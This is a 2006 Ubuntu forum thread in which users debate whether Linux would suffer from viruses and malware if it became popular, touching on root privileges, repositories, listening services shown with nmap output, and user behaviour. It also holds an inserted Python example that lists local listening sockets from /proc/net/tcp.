Ubuntu/Linux/Windows and Viruses/Malware
newlinux
October 3rd, 2006, 02:08 PM
I think the whole setup.exe culture that's become mainstream now has been the ruin of security and Windows-to-Ubuntu migration...
It's sad.
Amen.
Dinerty
October 4th, 2006, 10:47 AM
I think it comes down to the actual knowledge of the user, if you had 100 computer illiterate people working on windows or on Linux, they would probably all breach security by searching for software to install.
However I would say more harm would be done to windows systems, as everything is mostly .exe, whereas with Linux you get different formats, e.g. rpm, deb, source.
Mostly users would not understand source code/compiling and would more than likely just delete the package, rather than searching on how to install, so no harm would be done there.
But it's not to say Linux is impenetrable, all a user has to do is click .deb and enter password.
Seine
October 5th, 2006, 01:08 AM
But it's not to say Linux is impenetrable, all a user has to do is click .deb and enter password.
Yes, and the user gets very comfortable with entering their password often in Ubuntu.
3rdalbum
October 5th, 2006, 02:03 AM
The "dumb" users will stay with Windows, as it caters for them better. I'm not being nasty, or slagging off Windows - it's just the truth. Linux will attract the people who want to use their computer, as opposed to having their computer use THEM.
When the kind of people who want to use Linux start using it, they will become a part of the Linux community - a community which puts emphasis on "Don't install binaries which are not backed by a company or credible organisation" and "Don't run as root". Heck, on Windows I don't even install "Freeware" or "Shareware", even when it's been reviewed by Cnet.
By contrast, the Windows community has "Get an anti-virus program" and "Install the updates" as the only security messages. The Linux culture is completely different, and people who use Linux always end off with a true security practice.
aysiu
October 5th, 2006, 02:23 AM
I have to disagree with you there, 3rdalbum.
The subject of this thread is "If Ubuntu (or linux in general) were more popular," and if it were significantly more popular (20% desktop marketshare or above), we would attract dumb users.
What you're talking about with the whole "Linux community" would be the people using Gentoo, LFS, Slackware... yes, even Ubuntu.
The "dumb users" would be on Linspire or PCLinuxOS or some other "friendlier" distro.
And I know Kevin Carmony says Linspire allows you to create an additional user, but it still defaults to the first user being root.
nocturn
October 5th, 2006, 03:34 AM
I often hear that Windows just gets the bulk of the viruses because it's the most popular, and thus the virus will do the most damage. It seems like some angry hacker out there would throw together linux viruses or something just to show it can be done.
Is Ubuntu really more secure, or is it just that no one cares?
Yet, despite having had a majority market share for ever, Apache suffers much fewer attacks than IIS does. So this statement does not hold true.
Yes, an increase in Linux usage would make it a bigger target, but better security and safe defaults make it a harder target, specially since it is not a monoculture.
In an ideal world, one system should not have a 99% market share, be it windows or Linux. There is room for multiple interoperable Free Software OS's.
nocturn
October 5th, 2006, 03:37 AM
Actually virus could get root rights.. if the virus uses some unknown hole, that allows it to become root, then it could do about anything.
Yes, and this is how most Unix malware works. It is however much more difficult to write such an exploit than to make Hotchicks.wmv.exe and have it opened through Outlook which is running with admin privileges...
Writing malware based on such exploits also limits you to the window of vulnerability until the software is patched, which is rather small for most Free Software products.
dolphinsonar
October 5th, 2006, 01:55 PM
I think the reason people make viruses is to have the largest probability of success. This will always put the most popular software first. Windows is that.
When Linux becomes the only OS, there will be former windows and Mac users who are pissed, and will create viruses for us. Payback time? I am confident we can defend against them well enough in the information war...
weird_c00kie
October 13th, 2006, 06:56 AM
i've just run a bunch of online scans on an up-to-date installation of ubuntu 6.06 and so far the only things it doesn't seem to block on its own are ICMP ping requests
everything else is coming up completely stealthed
of course, my router which comes with a firewall could be having something to do with that, but they look like pretty decent results to me :p
Anonii
October 13th, 2006, 06:59 AM
Not using an Antivirus. I could survive without an Antivirus in Windows, I have absolutely no problems in Linux.
I'm using iptables with firestarter, tho, for a firewall. For maximum security.
weird_c00kie
October 13th, 2006, 07:00 AM
quick question.... reading through more of this thread, i see a lot of mention of "listening services"..... what are they? :p
darrenm
October 13th, 2006, 08:55 AM
i've just run a bunch of online scans on an up-to-date installation of ubuntu 6.06 and so far the only things it doesn't seem to block on its own are ICMP ping requests
everything else is coming up completely stealthed
of course, my router which comes with a firewall could be having something to do with that, but they look like pretty decent results to me :p
Nothing to do with Ubuntu unfortunately. As you're behind a NAT firewall it will choose whether to accept connection requests or drop or reject them.
If you were not behind a NAT router you would see the online scans reporting everything closed not stealthed. Default Ubuntu doesn't have any services listening anyway. A reject is as good as a drop unless you don't want anyone to know you're there.
pachjo
October 13th, 2006, 09:44 AM
I have a default install of Kubuntu 6.06.1 and I tested my setup with ShieldsUp and Hackers.org or something and every test came up stealthed and secure.
I have lost the links to wherever I did the tests but I got them from an Ubuntu link which recognised the sites as valid and trustworthy
Mimsy
October 13th, 2006, 03:59 PM
ShieldsUp (http://www.grc.com)
Alveric
October 13th, 2006, 04:13 PM
quick question.... reading through more of this thread, i see a lot of mention of "listening services"..... what are they? :p
Seconded - can someone who knows more than me please define "listening services".
My Ubuntu auto checks for updates and the update notification pops up on the panel - is that a "listening service" and if so is that a vulnerability?
Or if I put the Gmail notifier onto Firefox (I haven't!) - does that count?
Pretend I know nothing (to be honest, you won't have to pretend too hard!)
Thanks,
A.
darrenm
October 13th, 2006, 04:36 PM
OK guys easy.
Listening services are services that listen on your PC. They listen for incoming connections on whatever port you assign them or they default to.
e.g. Apache web server is a service and listens on port 80. OpenSSH-server listens on port 22. FTP server listens on port 21 etc.
A default install of (k)Ubuntu has no services installed or enabled.
An easy way to check is to open a terminal and type
nmap localhost
Which will port scan your PC and tell you if anything is listening. Mine reports back:
darrenm@darrenm-desktop:~$ nmap localhost
Starting Nmap 4.10 ( http://www.insecure.org/nmap/ ) at 2006-10-13 22:25 BST
Interesting ports on localhost (127.0.0.1):
Not shown: 1672 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
139/tcp open netbios-ssn
445/tcp open microsoft-ds
631/tcp open ipp
6000/tcp open X11
Which is a few. But should I be worried? No, because I use an ADSL router and I only have port 22 forwarded from my outside IP to my inside IP.
Therefore when I do an nmap on my IP from outside I get only port 22 open.
Not having a firewall installed on Ubuntu will mean if you port scan directly to the Ubuntu box you will get a reject back from the kernel for every port that doesn't have a service listening on it. This means a remote attacker will know there is something there but nothing listening and nothing to attack. If you have a NAT router then when a remote attacker port scans the router it will not have anything forwarded anywhere and will reject the connections (as most routers are just Linux anyway) or with more modern routers will just drop the packets and not send anything back.
nocturn
October 16th, 2006, 02:02 AM
OK guys easy.
Listening services are services that listen on your PC. They listen for incoming connections on whatever port you assign them or they default to.
e.g. Apache web server is a service and listens on port 80. OpenSSH-server listens on port 22. FTP server listens on port 21 etc.
A default install of (k)Ubuntu has no services installed or enabled.
An easy way to check is to open a terminal and type
nmap localhost
Which will port scan your PC and tell you if anything is listening. Mine reports back:
darrenm@darrenm-desktop:~$ nmap localhost
Starting Nmap 4.10 ( http://www.insecure.org/nmap/ ) at 2006-10-13 22:25 BST
Interesting ports on localhost (127.0.0.1):
Not shown: 1672 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
139/tcp open netbios-ssn
445/tcp open microsoft-ds
631/tcp open ipp
6000/tcp open X11
Which is a few. But should I be worried? No, because I use an ADSL router and I only have port 22 forwarded from my outside IP to my inside IP.
Therefore when I do an nmap on my IP from outside I get only port 22 open.
Not having a firewall installed on Ubuntu will mean if you port scan directly to the Ubuntu box you will get a reject back from the kernel for every port that doesn't have a service listening on it. This means a remote attacker will know there is something there but nothing listening and nothing to attack. If you have a NAT router then when a remote attacker port scans the router it will not have anything forwarded anywhere and will reject the connections (as most routers are just Linux anyway) or with more modern routers will just drop the packets and not send anything back.
Don't use localhost. It maps to the loopback device and is not exposed to the outside.
Run nmap against the IP address of your Ubuntu box and the picture will be different.
darrenm
October 16th, 2006, 05:12 AM
If you actually read my post that's what I've said. nmap'ing localhost will tell you what's listening and my point was when you nmap from outside it will tell what's being forwarded outside.
Perhaps actually reading the post you are replying to next time will be a little more helpful.
CaveRat
October 16th, 2006, 05:43 AM
e.g. Apache web server is a service and listens on port 80. OpenSSH-server listens on port 22. FTP server listens on port 21 etc.
A default install of (k)Ubuntu has no services installed or enabled.
So since I don't use any of these services anyway, (P2P, BitTorrent, etc.), delete and filter out email addresses I don't know or want, I'm pretty much secure? I have noticed 98 to 99% of the running processes are sleeping most of the time.
nocturn
October 16th, 2006, 05:59 AM
If you actually read my post that's what I've said. nmap'ing localhost will tell you what's listening and my point was when you nmap from outside it will tell what's being forwarded outside.
Perhaps actually reading the post you are replying to next time will be a little more helpful.
I don't think I misunderstood your post.
But I wanted to point out that regardless of having a router in place, there is a difference between services listening on localhost (127.0.0.1, loopback) and actually listening services on your real interface.
Which should be none on a default Ubuntu install. Hoary at least had some stuff for internal use listening on localhost (I think cups still does that on Dapper too, btw).
And yes, it does still answer to ICMP echo packets (ping), which many routers also do. Not answering them can cause connections to drop, so that's not a good idea by default.
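Added example, not part of any post in this thread: the loopback-versus-real-interface distinction discussed above, checked locally by parsing the kernel's /proc/net/tcp table instead of port scanning. The sample table is constructed, the function names are hypothetical, and a little-endian (x86) host with IPv4 only is assumed.

```python
import os
import socket
import struct

# Constructed sample in /proc/net/tcp format (not output from the thread):
# a print service bound to 127.0.0.1:631, an SSH server bound to 0.0.0.0:22,
# and one established connection that must not be counted as a listener.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0100007F:0277 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 11111 1 0000000000000000 100 0 0 10 0
   1: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 22222 1 0000000000000000 100 0 0 10 0
   2: 0A01A8C0:0016 0201A8C0:C350 01 00000000:00000000 00:00000000 00000000     0        0 33333 1 0000000000000000 100 0 0 10 0
"""

TCP_LISTEN = 0x0A  # state code the kernel uses for a listening socket


def decode_addr(field):
    """Turn '0100007F:0277' into ('127.0.0.1', 631)."""
    hex_ip, hex_port = field.split(":")
    # Assumption: little-endian host, where the kernel prints the IPv4
    # address as a byte-reversed 32-bit hex word. The port is plain hex.
    ip = socket.inet_ntoa(struct.pack("<I", int(hex_ip, 16)))
    return ip, int(hex_port, 16)


def exposure(ip):
    """Say which interfaces a bound address is reachable on."""
    if ip.startswith("127."):
        return "loopback only"      # reachable from this machine only
    if ip == "0.0.0.0":
        return "all interfaces"     # reachable from the network
    return "one interface"          # bound to a single non-loopback address


def listening_sockets(table):
    """Return sorted (ip, port, exposure) tuples for sockets in LISTEN state."""
    found = set()
    for line in table.splitlines():
        fields = line.split()
        # Data rows start with an index such as '0:'; the header does not.
        if len(fields) < 4 or not fields[0].endswith(":"):
            continue
        if int(fields[3], 16) != TCP_LISTEN:
            continue
        ip, port = decode_addr(fields[1])
        found.add((ip, port, exposure(ip)))
    return sorted(found, key=lambda s: (s[1], s[0]))


def exposed_ports(table):
    """Ports that a scan of the machine's real IP address could find open."""
    return sorted({port for _, port, where in listening_sockets(table)
                   if where != "loopback only"})


if __name__ == "__main__":
    path = "/proc/net/tcp"  # IPv4 only; IPv6 listeners are in /proc/net/tcp6
    if os.path.exists(path):
        with open(path) as fh:
            table = fh.read()
    else:
        table = SAMPLE_PROC_NET_TCP
    for ip, port, where in listening_sockets(table):
        print(f"{ip}:{port}  {where}")
    print("reachable from the network:", exposed_ports(table))
```

A scan of localhost reports both kinds of listener as open; only the ports returned by `exposed_ports` would answer a scan of the machine's real address.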
newlinuxuser
October 17th, 2006, 02:54 PM
I was wondering, as linux becomes more user-friendly and becomes more used will its security become compromised. Hypothetically if linux became extremely popular would it be right to assume that linux would become just like windows... please don't insult i'm not very clued up on the linux operating system but one of the main reasons I use Ubuntu daily is due to its security. I just want facts there seems to be a big uproar when mentioning security, anti virus, firewall etc
Thanks
Mike
argie
October 17th, 2006, 02:57 PM
Hmm, well, the big difference is the whole admin thing. You can't destroy the OS without getting administrator permissions, so a virus couldn't kill your OS (AFAIK) unless you specifically run it with sudo.
Also, Ubuntu in particular has repositories, which you can trust 100%, and because of so much software in these repos, you won't need to install dodgy software, hence avoiding what happened in the first paragraph.
monktbd
October 17th, 2006, 03:00 PM
while there surely will be more exploits for linux when it gets more popular these exploits will be not only fixed much faster but also won't have such a devastating effect like on windows where most people work with admin rights all the time.
the most important part of linux is that out of the box the security is rarely left behind for some more user friendliness (which actually often means windows like and not necessarily user friendly in my opinion).
newlinuxuser
October 17th, 2006, 03:00 PM
That makes a lot of sense, that's pretty cool - so the community keeps linux secure and afloat, so I guess the only real problem would be hackers... I guess they would need your root password to do damage, right? by default ubuntu doesn't run as root does it, hence all the passwords when you do want to run as root?
Thanks Mike
monktbd
October 17th, 2006, 03:07 PM
That makes a lot of sense, that's pretty cool - so the community keeps linux secure and afloat, so I guess the only real problem would be hackers... I guess they would need your root password to do damage, right? by default ubuntu doesn't run as root does it, hence all the passwords when you do want to run as root?
well i would not say that only the community repairs it because a lot of the major programs are also written by people employed by big companies (ibm, novell, red hat, trolltech, sun, etc...) but the open source of almost all linux components makes it easier to spot exploits and fix them.
if someone wants to compromise your system then he needs somehow root access. but actually also with your user account alone he can do a lot of damage to your data (and actually in ubuntu having your user password is mostly also the same as having the root password by using sudo). so important are strong passwords and some common sense. then one is almost perfectly secure under linux.
n0dl
October 17th, 2006, 03:07 PM
"User friendly" is such an ambiguous statement. To me Linux/Unix is friendly because I can do what I want with the system, such as make my own modifications to programs, modify themes for my desktop, pick my gui, and even edit the OS myself. Technically it's friendly to the user because it doesn't slap me in the face with licensing issues and lawsuits for making something run better, or am forced to sign my soul over the EULA which will bound me to this earth serving the microsoft tyrant for years to come in order to bring hell on earth (sorry for the trolling... microsoft's idea of "intellectual property" is not my favorite subject). If you mean in terms of automation windows doesn't even compare to OS X.
Therefore, the question is not "When will linux become like windows", because, linux will never be like windows because they are two very, COMPLETELY different animals, but "When will linux have more commercial support, driver support, etc etc."
Only time will answer that question
pbaehr
October 17th, 2006, 03:20 PM
A user-friendly OS and a secure OS are not exclusive of one another. Many of the security holes which plague Windows are a result of code written long ago.
I think if you start from a more secure point you will end up in a more secure place. You can add all the eye candy and GUI options you want without changing the underlying software that runs it all behind the scenes.
One of the other things that Linux has going for it is that it was created to be a multi-user OS from the start. One of the security issues in Windows XP was that they slapped a multi-user environment on a single-user OS without much thought.
Bottom line, I propose that a system can be both secure and easy to use.
aysiu
October 17th, 2006, 03:25 PM
Since it seems more discussion-oriented than support-oriented, I've moved this thread to the Ubuntu Cafe.
chaosgeisterchen
October 17th, 2006, 03:27 PM
I hope Linux will never become like Windows. Well, those two have a fundamentally different approach.
aysiu
October 17th, 2006, 03:41 PM
A few myths to dispel:
Popularity of the OS is the only difference in security
Windows XP and before (I haven't tried Vista) are not constructed with security in mind. You can make them secure, but if you try to run as a limited user, you'll find yourself coming up against a lot of obstacles, and you'll have to use a lot of workarounds to get the Run as command to work for all the functions you need.
Both Windows and many of the programs designed for it (http://www.pluralsite.com/wiki/default.aspx/Keith/HallOfShame.html) assume you operate as the administrative user.
Popularity has nothing to do with security
The more popular desktop Linux gets, the more targeted it'll be and the more dumb (i.e., not security-savvy) users that will come along for the ride. More malware creation + more dumb users = more exploits being exploited. Social engineering will always bypass good security design.
All you have to do is design some new "cool" application that new users want, make it a .deb file people can download and double-click, and they'll give away their passwords readily and allow you to install whatever malware you want. Dumb users don't care about trusted sources (like repositories). They'll install anything.
You need root access to do damage
You do need root access to do system-wide damage, but someone who is stupid and belongs to the admin group will install anything and so security goes right out the door.
Also, to me (and a lot of other users), the most important files on my system are the ones in my /home folder--my personal files. Those, if lost, cannot be replaced. System files, however, can be replaced with a simple reinstall. Regular back-ups of important personal files are important to do.
From the Seinfeld episode "The Robbery":
ELAINE: They were stolen.
JERRY: Stolen? When?
ELAINE: A couple a hours ago, the police are coming right over.
JERRY: Stolen?
ELAINE: [Kramer enters the apartment] Someone left the door open. [it's clear that she means Kramer; she walks to the bathroom]
JERRY: [to Kramer] You left the door open?!
KRAMER: Uh, Jer, well ya know, I was cookin' and I, I uh, I came in to get this spatula...and I left the door open, 'cause I was gonna bring the spatula right back!
JERRY: Wait, you left the lock open or the door open?
KRAMER: [bobs his head guiltily] The door.
JERRY: The door? You left the door open?
KRAMER: Yeah, well, I was gonna bring the spatula right back.
JERRY: Yeah, and?
KRAMER: Well, I got caught up... watching a soap opera...[with a broken voice] The Bold and the Beautiful
JERRY: So the door was wide open?
KRAMER: Wide open!
JERRY: [Elaine enters the living-room] And where were you?
ELAINE: I was at Bloomingdale's...waiting for the shower to heat up.
KRAMER: Look, Jerry, I'm sorry, I'm uh, you have insurance, right buddy?
JERRY: No.
KRAMER: [looks shocked] How can you not have insurance?
JERRY: Because...I spent my money on the Clapgo D. 29, it's the most impenetrable lock on the market today...it has only one design flaw: the door...[shuts the door] must be CLOSED
In case you don't get the analogy, the Clapgo D. 29 is desktop Linux, and Kramer is a bunch of new users who would be the majority of users if desktop Linux became popular.
chaosgeisterchen
October 17th, 2006, 04:05 PM
That's a nice way to show how reality looks like, aysiu.
bastiegast
October 17th, 2006, 04:19 PM
I just noticed since edgy, ubuntu warned me for unsafely unplugging my usb-storage - ARGHH! Ubuntu IS more and more windows-like XD ;)
Shin_Gouki2501
October 17th, 2006, 04:23 PM
to refer to the topic, linux will hopefully NEVER become "just like windows" it will be even BETTER, for the time amount:
at least 2 years
some major things need to happen before
wbr Shin Gouki
Polygon
October 17th, 2006, 07:25 PM
it will be more stable, have better security, and there will be less spyware and viruses due to the more secure the webbrowsers are and the overall operating system is, but there is still no way to have a totally secure operating system if the person running it is a complete idiot =P
Abstract
October 17th, 2006, 07:32 PM
The day Ubuntu (Linux) looks just like Windows is the day I leave. I left Windows because I enjoy a challenge. Plugging something in and having it work is boring. Why not set it up manually if you have the time? I do not like the way Windows works in many dimensions.
l0c0dantes
October 17th, 2006, 08:06 PM
My dad recently got a computer, and because I was going away to college, I put on linux for him because I knew there was no way he would take care of a computer. I set everything up for him nice nice, explained all the things that he would want to do, and told him if something doesn't work, play around with it.
Also, I never told him what the sudo password is :)
viper
October 17th, 2006, 09:57 PM
NEVER, NEVER :mrgreen:
IYY
October 17th, 2006, 10:15 PM
It will never become just like Windows, but as it grows more popular you will have to be more careful about downloading programs from unofficial sources. Not that you do that often in the Open Source world, but still.
aysiu
October 17th, 2006, 10:18 PM
Linux is just a kernel.
"It" cannot be just like Windows. Windows is one product produced by one company. Linux is a host of distributions, targeting various needs and types of users.
Damn Small Linux, SELinux, Fedora, Slackware, LFS, and Ubuntu will never serve the same needs. There will always be a variety of distributions. Maybe one (Linspire?) will be "just like Windows," but they can't all be.
zenwhen
October 17th, 2006, 11:00 PM
The whole "Linux is only secure until the masses move to it" idea isn't based on anything I would consider to be logic. Apache holds between 60 and 80% of the web server market share, and a very large percentage of machines running Apache are running Linux.
You mean to tell me people do not wish to compromise these servers? You mean to tell me people aren't already banging away at Linux?
Exploits are found very often. They are reported. They are fixed. Everything is disclosed. The open source model makes this a very efficient process.
With Windows, the vulnerability to viruses is not being addressed. Microsoft itself is even selling anti-virus software. It is a complete joke.
If a base vulnerability to automated self propagating malicious programs existed in any distro of GNU/Linux, it would be hammered out so fast it would make Steve Ballmer's head spin. Why?
Pride, community, and the power of the open source development model. Full disclosure of source code allows the bad guys and the good guys to find the holes, the developers to patch them up, and everyone the opportunity to improve the software.
Linux cannot become like Windows because it is different on a philosophical level. Linux isn't an up and coming competitor. GNU/Linux is a replacement for the entire idea of proprietary software. Yes, there is currently a need for free (or open source) software to be interoperational with proprietary software, but things are improving in that area.
Linux will never be "just like Windows". However, Windows users with terrible habits will be Linux users with terrible habits. The only computer that is safe for use by a person who cannot make use of common sense to use is one without any writable drives.
shane2peru
November 8th, 2006, 07:04 PM
Ok, I have read this post, and been thinking about it. I think the biggest problem of viruses is not necessarily programs that are installed but rather email. I have successfully run Windows Virus free for quite some time, oh, it comes at a cost, of Name Brand Firewall, and Name Brand Anti-virus. However I have been running Ubuntu for a while now, and when I switched over to windows and it started scanning, it found viruses that were on the Linux partition (I can read ext3 from windows.) I started scanning my directories now with ClamAv, and have found viruses that come in my email. I have not figured out how to get it to automatically scan my email, but I think that is the virus hazard that is bigger than installed programs. Granted, I don't open the attachments, but they sit there as a potential danger. Lost my whole junk folder in Mozilla because of this, and had to make a new one, I know not a big deal, but bothersome to me that it could even set there, when it is not even let in the door on my XP partition. That is my 2 cents worth, and yes, the more 'stupid' users you have the more problems there will be on their systems.
Shane
aysiu
November 8th, 2006, 07:13 PM
I've moved this to the Cafe, since this is more discussion and not so much a testimonial.
By the way, I created a short security FAQ:
http://www.psychocats.net/ubuntu/security
fakie_flip
November 8th, 2006, 07:46 PM
I'm not so sure about Linux having the problems windows has if it were used as much. Its primary advantage is being open source. The way a unix system is setup makes a big difference too. A normal user can't modify important system files. Firefox is used very much and probably just as much or more as IE. It is open source. It does not have the problems of IE. It doesn't bring in loads of spyware, trojans, malware, adware, viruses and others just from browsing the web.
fakie_flip
November 8th, 2006, 07:51 PM
All the security features of VISTA (Viruses Infections Spyware Trojans Adware) really puts a load on the system and slows it down. Who wants to click on pop ups all day to do normal tasks because there is loads of security junk? That's worse than SP2.
Bezmotivnik
November 8th, 2006, 07:55 PM
I don't know about viruses per se, but if we get more users we will get more malware... mainly because attracting more users means attracting both malicious parties and stupid users.
Bingo.
Portable_Jim
November 9th, 2006, 04:34 PM
I think that the reason that linux does not have any viruses is that everyone that knows how to code is using Linux (who would be crazy enough to write a virus for windows while using windows - then get infected yourself and have to wait till microsoft release a patch).
What do you think?
jpeddicord
November 9th, 2006, 04:41 PM
I'm sorry - I don't really get it. If everyone that can code uses Linux, then wouldn't the viruses be on Linux, since viruses are written by coders?
Also, the reason that there is no (or very few) Linux viruses is that the filesystem and root accounts make it extremely hard for a virus to destroy your PC.
There is one type of "virus" (more like a prank) called a fork bomb. I'm not going to link to it here for many reasons, but you can find it on Wikipedia. It is one line of code that splits into many threads, causing almost an instantaneous lockup. It's more of an annoyance than anything else. With more restrictive machines that restrict the number of processes that can be run, it is even harder for the program and other viruses.
aysiu
November 9th, 2006, 04:42 PM
There may be a grain of truth to your hypothesis, but it's a very small grain, and only one of many other contributing factors to the lack of Linux viruses in the wild.
For more on my thoughts on the matter:
http://www.psychocats.net/ubuntu/security
funkyade
November 9th, 2006, 04:43 PM
who would be crazy enough to write a virus for windows while using windows - then get infected yourself and have to wait till microsoft release a patch ](*,) ](*,) ](*,)
LOL. Can just imagine it!
Don't think your hypothesis holds however...
Portable_Jim
November 9th, 2006, 04:56 PM
I'm sorry - I don't really get it. If everyone that can code uses Linux, then wouldn't the viruses be on Linux, since viruses are written by coders?
why write a virus for the OS you are using - you will get infected yourself?
IYY
November 9th, 2006, 05:01 PM
There is some truth to this. Linux users tend to use it for ethical reason, so why would they want to do something malicious like infecting other machines?
jpeddicord
November 9th, 2006, 05:03 PM
why write a virus for the OS you are using - you will get infected yourself?
You won't get infected yourself if you don't release it on yourself. ;)
It is nearly impossible to write a virus for one OS from another OS. Trust me, almost every virus writer for Windows uses Windows.
jpeddicord
November 9th, 2006, 05:03 PM
[Sorry, double-post]
skymt
November 9th, 2006, 05:25 PM
I expect most modern virus writers develop and test in a virtual machine. If I were writing a virus, I'd also come up with some way for the virus to identify and ignore my own computer.
illu45
November 9th, 2006, 06:10 PM
I think that most virus writers are intelligent enough to avoid getting viruses (especially their own) themselves. As far as writing a virus that can identify your computer, I think that most virus writers would avoid that because, if the virus was taken apart, others could identify the creator's computer as well.
Engnome
November 9th, 2006, 06:44 PM
I expect most modern virus writers develop and test in a virtual machine. If I were writing a virus, I'd also come up with some way for the virus to identify and ignore my own computer.
Yeah cause it would be so hard for the FBI to identify you otherwise :p
On topic I think your theory is very odd, doesn't make any sense. If you wrote the virus you know how to protect yourself. Unofficial windows patches for serious exploits (like the WMF one) were released before the MS official ones.
po0f
November 9th, 2006, 06:51 PM
Most virii target exploits/vulnerabilities in system libraries. Using Linux, it is hard to take down the whole community, because between distributions (and releases of that distribution), library versions and kernel versions are very likely not the same. For example, the Ramen virus (http://www.f-secure.com/v-descs/ramen.shtml) only affected RH 6.2-7.0, even though there were plenty of other Linux boxen out there running the same services.
PatrickMay16
November 9th, 2006, 07:01 PM
Barely any computers are running linux compared to the number of machines running windows.
If you're writing a virus, you most likely want to hit as many machines as possible. So you're not going to write it for a niche-market operating system.
hardyn
November 9th, 2006, 07:08 PM
you would have to think it has something to do with the most effective deployment. poOf makes a point, not every linux user is using the same system; unlike windows where everybody's system is exactly the same.
but if you are going to spend the time to write something malicious; you probably want to get your times worth. with about 95% of desktop users in the world using windows it's a pretty sure bet you're going to get time back-out if you wrote your virus to work under windows... that said the other 5% of people, the linux users, are usually smart enough to not get viruses even if they were using windows. I have used windows for years, making the switch to ubuntu about 9mo ago. I only once had a virus problem, and it was my fault (email bomb, email from a friend that usually sends me junk email, didn't think it would be problem, oops).
... and if we want to play conspiracy theory, there aren't many people making virus software for linux... but there are A LOT of companies making virus software for windows, and most of these virus packages aren't cheap; it's big business... coincidence?
mo79
November 9th, 2006, 07:32 PM
If Linux was running on more computers, virus writers/hackers would aim at this. Linux might be more secure, but if the data is good, the effort is eventually no object.
While with Windows being flakey security wise too (by default), the 13yr old with a mean streak would even attempt to take down his Gran's website (especially if it contains a horrid pic of him!)
skymt
November 9th, 2006, 08:43 PM
As far as writing a virus that can identify your computer, I think that most virus writers would avoid that because, if the virus was taken apart, others could identify the creator's computer as well.
I meant that the virus would check certain characteristics of the computer as the first step in infection, and if they match the ones programmed into the virus, the infection process would be canceled. For example, it could compare a registry value or the contents of a file with a hash built into the virus.
funkyade
November 10th, 2006, 06:02 AM
Most virii target exploits/vulnerabilities in system libraries. Using Linux, it is hard to take down the whole community, because between distributions (and releases of that distribution), library versions and kernel versions are very likely not the same. For example, the Ramen virus (http://www.f-secure.com/v-descs/ramen.shtml) only affected RH 6.2-7.0, even though there were plenty of other Linux boxen out there running the same services.
Just a thought but if with the rising popularity of Linux as an OS, and therefore the likelihood of more 'homogenous' installs - i.e. default unpatched install from CD/DVD. Wouldn't this mean more people had the same versions of libs etc... You could also target users running a particular app that has a dependency on a particular version of a lib, such as Open Office.
May we get some variation of 'back orifice', such as 'furry front orifice'? We may then be well and truly shafted.... :-# :rolleyes:
just my deux centimes...
Sef
November 10th, 2006, 06:27 AM
It really reflects security. Apache has about 67% of the market for web servers, and Microsoft has about 20% of the market. Guess which one has more problem with viruses, worms, trojans and other malware?
po0f
November 10th, 2006, 07:31 AM
... the likelihood of more 'homogenous' installs - i.e. default unpatched install from CD/DVD ...
That could happen, but how often do people leave an install as is? Probably not often enough to tempt someone into writing a virus specifically targeted at default installs of distro X. The first thing I do, on installation of any OS, is download updates.
... 'furry front orifice' ...
Lol, thanks for the visual first thing in the morning. :)
MaximB
November 10th, 2006, 07:45 AM
It really reflects security. Apache has about 67% of the market for web servers, and Microsoft has about 20% of the market. Guess which one has more problem with viruses, worms, trojans and other malware?
M$ with only 20% ?
wow - I guess I'm in the wrong business.... (just finishing my MCSE....everyone needs to have a job ;)).
funkyade
November 10th, 2006, 07:54 AM
Lol, thanks for the visual first thing in the morning. :)
Just doin' ma jahb. ;-)
tuxcantfly
November 11th, 2006, 01:03 AM
There is room for multiple interoperable Free Software OS's.
No there is not. We live in a world of uniformity; it will be either windows, or linux, or neither, not and. This concept of having many OS's coexisting is the very reason linux hasn't gone mainstream on the desktop yet; there are too many half-good distros, and no main, unified, universal distro you could point to and call "linux" (yes, I know it's a kernel, but it's what many people call an operating system). Fragmentation is not an option, and it should not be promoted; ubuntu should make unifying the free software/linux world a priority, as it must do so before it can be truly competitive in the windows world. As for the question, yes, the instant Dells start shipping with ubuntu, which I doubt will ever happen, people will start double-clicking on random debs that come via spam, give their password, click-click-click on next as they did in windows, and no security exists, or will ever exist, that will protect against stupidity.
d3v1ant_0n3
November 11th, 2006, 01:21 AM
As I always understood it (and I might be horribly wrong here), the biggest liability from malware (apart from PEBKAC), was the malware writers exploiting weaknesses on 'x' software (say outlook) running on 'y' version of Windows 2000 SP3. Due to the sheer number of windows users, there is a likelihood that there will be a significant number of targets for the malware.
With GNU/Linux, there is a huge variety in software being run. There's tweltybillion varieties of linux distros, with users running different kernels, custom kernels, and massive varieties of browsers/email programs/everything. So the number of potential targets for malware drops exponentially.
Please correct me if i'm completely wrong.
tuxcantfly
November 11th, 2006, 01:28 AM
With GNU/Linux, there is a huge variety in software being run. There's tweltybillion varieties of linux distros, with users running different kernels, custom kernels, and massive varieties of browsers/email programs/everything. So the number of potential targets for malware drops exponentially.
Yes, in its present state, GNU/Linux is like that. But think of how it would be like when, if ever, it gets a significant market share in the desktop market. By then, there will be far less variety in linux, and there will be more uniformity. The only way linux will attain a large market share is if it is shipped preinstalled with computers, because the vast majority of users do not know how to, or feel no need to replace whatever OS came with their computer. And when, if ever, Dell, HP, and the big companies are shipping linux, whatever version they're shipping will be used by 99.9% of linux users. So although variety protects us now, it will not later.
tuxcantfly
November 11th, 2006, 01:35 AM
And also, there's way too much emphasis put on automated exploits right now. While ubuntu can protect against this by creating a secure OS, it will not, nor can it, protect against the other major cause of security breaches: the lack of common sense. Among all the instances I've heard of people having issues with their (windows) computers, most of them had to do with them getting some random malicious .exe file from either spam or some 3rd party web site and installing it. How can this differ with .deb files? Even if we put in warning signs and requests for passwords, if users just click-click-click on "next" and "ignore" like most windows users I know do, they will bypass all security mechanisms and get malware installed. So yes, we will have more viruses, spyware, adware, and other malware.
tuxcantfly
November 11th, 2006, 01:43 AM
And as for this idea of making software installation all be done through a unified, secure, apt system, it simply won't work. Think of what happened with microsoft's attempt at something similar: msi. It was supposed to make software installation and removal more uniform, and make everything more secure. But I still see the vast majority of windows applications being distributed as setup.exe files, because some people simply ignore whatever methods are supposed to be used for distributing programs, and use their own. Similarly, while some 3rd party application distributors will adopt the secure apt method, lots will simply use methods like sending them as raw binary executables, which would bypass ubuntu's entire security, and allow for installation of malware.
